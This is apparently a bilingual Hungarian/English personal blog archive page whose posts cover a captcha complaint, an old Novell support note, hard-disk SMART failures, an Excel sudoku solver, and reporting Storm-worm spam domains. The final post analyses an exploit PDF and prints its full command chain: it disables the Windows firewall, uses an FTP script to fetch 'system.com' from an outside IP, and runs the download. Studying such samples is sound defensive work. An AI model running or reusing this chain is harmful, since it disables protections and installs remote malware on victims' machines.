English « maques’s sparks

Far Manager - how to ruin a site

Monday, September 21st, 2009

I like Far Manager a lot (and Midnight Commander as well on linux boxes, if we’re here), as I grew up on Norton Commander. Once someone knows the keyboard shortcuts, he can work with that lightning fast.

Now, it happened, that I got a freshly installed notebook and one of the first things was to get Far Manager installed.
I visited the site, and found that the latest versions only available in .7z format.
Since I didn’t want to install 7-zip first, I downloaded an early install package in the good-old (erm…) .exe format.

Then, I thought I let them know, that maybe it is not the best idea to host the newest versions in .7z format, or at least provide an .exe version, but I couldn’t find a contact link on the site.

Then, I saw the forum!
Easypie - so I though -, I just register and drop a comment.
However, on the registration page, I faced an Impossible Mission!
A dreadful captcha, which was not just hard to read, but was impossible to read!
I tried to guess, but wasn’t successful, then I got another one, “Impossible Mission II” captcha.
To demonstrate what I am talking about, here are the two images I got (and no, I don’t have 16 color EGA mode selected on my computer). Anyone goes to the registration page can get similar ones.

(and no, “30M92″ wasn’t a good answer…)

No wonder there are no activity on the forum!

Finally, I found a contact address at the “If you are visually impaired or cannot otherwise read this code please contact the Board Administrator.” section, I sent a mail on this “captcha” and 7z issues, but so far I didn’t get any answer…

I believe I did all I could - even wrote a blog entry! :-)

Posted in Bosszantyú, English | 1 Comment »

Ne kicsinyeskedjünk…

Tuesday, March 24th, 2009

Ez is egy régebbi anyag - na jó, baromi régi, 1991-ből a Novell NSE adatbázisából -, de az ilyeneknek egyszerűen fenn kell maradnia örökre!
Ez a hozzáállás kéremszépen, én is szeretnék sok sok ilyen “user”-t…

This is an old material too -well, extremely old, from Novell’s NSE database, 1991 -, but articles like these must be kept public forever.
This is the real attitude, I’d like to have many many users like this…

FYI: “Mirror Copies of Volume Dir Dont Match” - Ontrack

DISCLAIMER

The origin of this information may be internal or external to Novell. Novell makes every effort within its means to verify this information. However, the information provided in this document is FOR YOUR INFORMATION only. Novell makes no explicit or implied claims to the validity of this information.

TITLE: “Mirror Copies of Volume Dir Dont Match” - Ontrack

DOCUMENT ID#: FYI.P.4291

DATE: 09OCT91

PRODUCT: NetWare

PRODUCT VERSION: v3.11

SUPERSEDES: NA

SYMPTOM:

The user had extremely sensitive data stored on a file server in Kuwait. Thinking something was wrong, the user turned off the power to the server. After powering the machine back up, the system displayed the following error message:

┌───────────────────────────────────────┐
│Mirror copies of volume dir dont match │
└───────────────────────────────────────┘

ISSUEPROBLEM

The Novell technician told the user to run VREPAIR because it fixes this problem 99 percent of the time. The user did not want take the 1 percent risk of running VREPAIR.

SOLUTION

The user flew a team from Ontrack to Kuwait and they successfully recovered 100 percent of the data.

Ontracks data recovery phone numbers are the following:

USA 1-800-872-2599

International 1-612-937-5161

FAX 1-612-937-5750

Ontrack has two offices in the U.S. and one in Europe.

Ontrack London office

Phone: 44-81-549-3444

Fax: 44-81-546-6642

Posted in Case Study, English, Móka, Novell, technikai infók | No Comments »

Logikus kismókus

Tuesday, November 11th, 2008

Apa, kész vagyok! Most adjál valami bonyolultat…
Dad, I am ready! Now give me something difficult…

Boldog születésnapot Mókuska!
Happy birthday little squirrel!

Posted in English, Kiscuki, Personal, képek | 1 Comment »

08-07-06

Sunday, July 6th, 2008

Happy Birthday / Boldog születésnapot Balázs!

Born at 00:10 with 3710 grams (8.18 lb), 56 cm (1,9 ft) - All systems running…

00:11

00:16

17:17

Összehasonlítandó / to compare with:

(Gáborka, 2005 november 10.)

Posted in English, Kiscuki, képek | 4 Comments »

SMARTy

Thursday, June 26th, 2008

HDD manufacturers invented S.M.A.R.T. some years ago.
So we should be happy, though I am not.

For one thing, there are no default error rates for attributes/thresholds, but manufacturer’s define (see also) when a drive is bad, and when it is good. Then of course they define it “to the extremities” so a drive in some cases can never go to bad SMART state even if it has constant problems. See more on this at: http://www.hdsentinel.com/smart/, from section “#1 Incorrect thresholds”.

I understand that current technology - in the microns - needs different approach than 10-15 years ago, but I fail to understand for example how a “197/C5″ (Current Pending Sector Count) attribute can exist and increase without big red warnings. This means that the sector was successfully written once, but later on it was couldn’t be read (equals data loss). And this doesn’t count as an error (according to harddisk manufacturers), only an increase of an attribute (which can decrease too!). My point of view is that this is sort of the equivalent of the “old day’s” dreadful “bad sector” term. Though that time this things usually happened at write time, so you could immediately notice.

This is a picture of one of my (brand new) Samsung HD501LJ harddisks after 2 days of operation.

The second one followed it’s “path” some days later.

They were mirrored, but swap got corrupted, then ssh and console got swapped out and couldn’t make it back to the memory. So eventually I had to power off the server and since the mirror broke, I didn’t have a fully readable, “mirrorable” array or disk, so I had to do a file by file copy to new disks. Of course off peak, so it was like from 01:00 to 04:00. Was fun… [not].

I also installed a server with 8 Samsung 500 drives, eventually we had to replace all (Hitachis seem to work fine).
If you format/rewrite a harddisk with a bunch of these “read errors”, then voila: the errors go away. Then manufacturer refuses to replace the harddrive - because of “no errors”. So we stopped selling Samsung harddisks.

I consulted my friend who recovers data from damaged disks, and he confirmed that Samsung is “experiencing problems” with the PMR technology and recommended Hitachi and Seagate drives to use. I then used then a pair consisting of a Hitachi and a Seagate drives to avoid simultaneous failure because of same technology/same time manufacturing.

“Hitachi drives use quite special own technology to park HDD heads outside of magnetic disks area to a special parking ramp. This causes HDD heads not to suffer from parking - they’re NEVER land on disk surface during parking. So, actually, Hitachi HDDs can handle a LOTS of starts/stops without any real problems.” [quoted from here] - [original hitachi article / same in html, from google cache]
Parking _on_ the platter can be seen here (picture 1 and 2).

Even if your server runs 24/7 in a server room with proper power and climate, it can happen that you stop your server and it’s harddisk[s] would never spin up again - because of the contact with the drive’s surface it can get stuck in the dirt (then might even fell off at a restart).

Additionally meanwhile most manufacturers (Hitachi/IBM, Seagate and even Samsung) use embedded servo on all platters nowadays, some models have only one servo information for all platters (”Format Disk with Servo Tracks Once, Use Servo Information with Many Heads“) which makes an occasional recovery less possible because even when a professional disassembles a faulty drive, the platters can move, then chances to recover anything from those platters without servo information is near to impossible.

So kids, avoid Samsung drives for the time being…

Posted in Bosszantyú, Case Study, English, technikai infók | 3 Comments »

Idiots of the day (month?)

Monday, February 4th, 2008

Imagine that you want to report a spamvertized link to its support/abuse team on a site that’s main purpose is to serve links. Would you imagine that your report gets rejected because they use URI spam filtering, and their site happens to be listed there?
Well, get started…

    SMTP error from remote mail server after end of data:
    host 2url.org [72.34.37.221]: 550-Blacklisted URL in message. (2url.org) in [black]. See
    550 http://lookup.uribl.com.

Relevant URIBL screenshot

ROTFL or cry?

Posted in Bosszantyú, English | 3 Comments »

Excel Sudoku solver - non-macro version

Wednesday, January 30th, 2008

Régebben ígértem egy sudoku megoldó Excel táblázatot, mely makrók nélkül, csak a beépített funkciókkal oldja meg a feladatot. Hát itt lenne. Át akartam tenni OpenOffice.org alá is, de ez a különbségek miatt most nem jött össze, esetleg valaki vállalkozó szellemű majd megteszi helyettem…
A táblázat jelenleg csak az alap sor/oszlop/3×3 alapú kizárással dolgozik, nem csinál dupla (tripla, stb.) számpár alapú kizárást, de ez elég a feladványok nagyrészének megoldásához. Szerintem a számpár alapú kizárás is megoldható, de egyenlőre ezt a feladatot is a kedves olvasóra hagyom. A táblázat működésének tanulmányozása (például az eredmény pirossal történő megjelenítése és hasonló nyalánkságok) is az olvasó épülésére szolgálhat.

Some time ago, I promised you a proof-of-concept Sudoku solver in Excel, WITHOUT using macros.
So here it is, a Sudoku solver, using Excel functions only.
I was to adopt it to OpenOffice.org too, but due to differences, I gave it up after some time. Maybe someone will take some time to do that…
The spreadsheet currently doesn’t solve “double (triple, etc.) naked pairs”, only “standard” row/column/3×3 rule outs, but that’s enough for most of the basic/middle level puzzles. I believe that the “naked pairs” rule out could be implemented too, without using macros too. Check out used methods/functions in this spreadsheet to learn “quirks” (like show results in red) you might be able to implement somewhere in your spreadsheet sometime, to make others happy…

Download sudoku.xls / sudoku.xls letöltése

Screenshot / képernyőkép

Posted in English, Microsoft, technikai infók | 2 Comments »

Az első matchbox élmények…

Sunday, January 13th, 2008

Melyik legyen a következő versenyző a törésteszten?
/Who’s gonna be the next contestant in the crash-test?/

Ah, meg is van…
/Ah, we have it…/

“About an hour and a half ago - we’ve had no explanation - police estimate some three to four hundred people - they just, they just got out and walked. God! We’ve gotten confirmation we cannot find anyone…
I’ve never seen anything like this…”
[REM - Everybody Hurts - Lyrics]

(dedicated to Sam.Joe)

Posted in English, Kiscuki, Móka, képek | No Comments »

Merry Christmas - Not…

Wednesday, December 26th, 2007

Guess what’s happening on Christmas?

E-mails starts to flow wishing merry christmas with links to uhavepostcard (dot com) and merrychristmasdude (dot com). One gets suspicious. And it turns out, one is right - again. Do not visit the above links unless you keen on getting some new trojans…

After adjusting our server’s spam filter, I do some more research. Some antivirus products recognise the downloadable, some not.

Domains were registered on 23rd of December, the registration data are obviusly fake (ZIP 12345, yahoo and hotmail e-mail accounts, etc.).
The problem is with this domain based spamvertizing, that - unlike the IP based ones - the domain can exist and can be maintained for longer period of time, it’s nameserver records can be changed, which by the way currently consist of 2*13 entries from different countries and different ISP-s.
Serving of the “webservers” IP address are done by these “bot-NS” servers, from a pool of thousands of other bot’s, so it is easily understandable that stopping these is impossible.

So, then one writes to the domain registrator company - responsible for registering the domains in question - to null out the nameservers and put the domain on hold (render the domain useless and not to let the domain to be registered elsewhere). The registrator happens to be Russian (RU-CENTER), which doesn’t look good at first sight.

However, some answer comes back, with the essence of that I should report to ICANN/Internic, if the domain have invalid registration data. Then after ICANN notifies them, they try to contact the owner, and if no answer comes back in 2 weeks(!), then they switch off the domain.

Those who understand even a tiny bit what this is about, now say “ridiculous”. After two weeks from now, whent the trojan was downloaded million times, noone will care whether the above domains exist or not.

I’ve tried once more explaining that if we can’t kill it at the domainregistration level, there is no chance doing anything else, like digging up thousands of bot’s IP’s and reporting them one-by-one (meanwhile newer ones join).
The last reply I got is currently this:

“We have initiated the check of the Whois information according to advised ICANN procedure. If it is really fail we will remove domain names.”

I’m really curious when will anything happen to these damned domains.

Update:
Dec 26, 18:04 [UTC +01:00] - New spamvertized malware hosting domain: HAPPYCARDS2008[.COM] - similar fake details, new registration, etc. Another urging message to the Russians. A slogan popped up into my mind, from an early MTV environmental advertisement. “If you’re not part of the solution, you’re part of the problem…”

Dec 26, 20:33 [UTC +01:00] - I didn’t get any answer from RU-CENTER nor I see the domains disappearing. So I encourage anyone who cares a little bit to contact (”bomb”) RU-CENTER at the “tld-ncc [@] nic.ru” address regarding to this matter. Other forms of contact can be seen here: http://www.nic.ru/about/en/contact_ncc.html
I’m amazed how many people wrote blog entries on this issue, yet none seemed to contact the only place which can do anything, the “tree root”. Come on people, you can do better. Or do I have to save the world (again) single handedly? :-]

Dec 27, 10:15 [UTC +01:00]
1st newyearcards2008[.com] spams - RU-Center urged to act again. Seems like if you want to spam, you should choose them to register your domain…

Dec 28, 16:51 [UTC +01:00]
new domain: newyearwithlove.com - reported at ICANN/Internic

Jan 05, 15:39 [UTC +01:00]
As you might have guessed, I got tired of reporting to an unresponsive registrator, internic and sirt.
There is not much I can do, and many others started to complain and comment on this issue.
Such as - but not limited to:
http://www.castlecops.com/p1038986-storm_worm_spam.html#1038986
Where - among others - you can see my “open letter to RU-CENTER”.
That was addressed on the 28th of December to ru-ncc@nic.ru, tld-ncc@nic.ru, tld-adm@nic.ru, tld-tech@nic.ru and info@cert.ru
Since they didn’t bother to do anything or at least answer, the most I can do is to list their addresses here and hope that email address harverster bots will “get the message” and eventually make them feel the same way like many of us.

Spamhaus complaint listed at: http://www.spamhaus.org/news.lasso?article=624

List of all domains registered relating to this fast-flux storm-bot Christmas/New Year “event”:
http://www.spamtrackers.eu/wiki/index.php?title=Storm#December_29

Jan 09, 15:53 [UTC +01:00]
Just received a mail from RU-CENTER:

“Dear Sirs,

The domains:

HAPPYCARDS2008.COM
NEWYEARWITHLOVE.COM
UHAVEPOSTCARD.COM
MERRYCHRISTMASDUDE.COM

are put on hold,

–
Best Regards,

Julia A. Lotkova
Regional Network Information Center (RU-CENTER)
Phone: +7 495 737-0601
fax: +7 495 737-0602
http://www.nic.ru“

I checked all known domains, they show “NOT-DELEGATED” and seems like they dont’t work anymore.
And it only took like 16 days!!!
Let’s be happy folks - and prepare for the new domains which will be registered soon…

Jan 10, 11:51 [UTC +01:00]
“From: “RU-CENTER NCC”
Sent: Thursday, January 10, 2008 11:51 AM
Subject: [ru-center #1781157] Re: open letter to RU-CENTER

Dear Sirs,

The domains are put on hold, thank you for your report.
New alike registrations are monitored.

–
Best Regards,

Julia A. Lotkova
Regional Network Information Center (RU-CENTER)
Phone: +7 495 737-0601
fax: +7 495 737-0602
http://www.nic.ru”

so let’s hope that at least new domains won’t be registered here.

Posted in Bosszantyú, Case Study, English | No Comments »

Az előző PDF exploit magyarázata - details on PDF containing exploit

Tuesday, October 30th, 2007

Így néz ki a tegnap kapott biztonsági hibát tartalmazó PDF fájl:
(This is how the recently received PDF document’s exploit looks like:)

../../../windows/system32/cmd”.exe”" /c ” cmd

/c = kódvégrehajtás “parancs1 & parancs2 & … & parancsN” formában, idézőjelek között, “&” jellekkel elválasztva.
/c = execution of commands, between quotes, separated by “&”s, eg.: “command1 & command2 & … & commandN”

set
cls

netsh firewall set opmode mode=disable
kikapcsoljuk a tűzfalat (disable the firewall)

echo o 81.95.146.181 >i
echo binary >>i
echo get /system.com >>i
echo quit >>i
“i” nevű ftp scriptet kreálása, mely megnyitja a 81.95.146.181-es hostot, bináris módba kapcsol, letölti a system.com-ot majd kilép.
(Creation of FTP script “i”, which will open 81.95.146.181, switches to binary, downloads system.com then exits)

ftp -s:i -v -A >nul
Az FTP script végrehajtása (-v=távoli kiszolgáló válaszainak letiltása, -A=Anonim bejelentkezés)
(Execution of the FTP script. -v=don’t display remote replies, -A=use anonymous account)

del /q i
Script törlése (Delete script)

start system.com
Letöltött “system.com” indítása
(Execution of downloaded “system.com”)

—

Mellesleg én nem tudtam letölteni de még kapcsolódni sem a fenti IP-hez, valószínűleg túl lett terhelve vagy lekapcsolták…
(BTW, I wasn’t able to download or even connect to the above IP. Might be overloaded or kicked off.”)

Posted in Case Study, English, technikai infók | No Comments »

maques’s sparks

Archive for the ‘English’ Category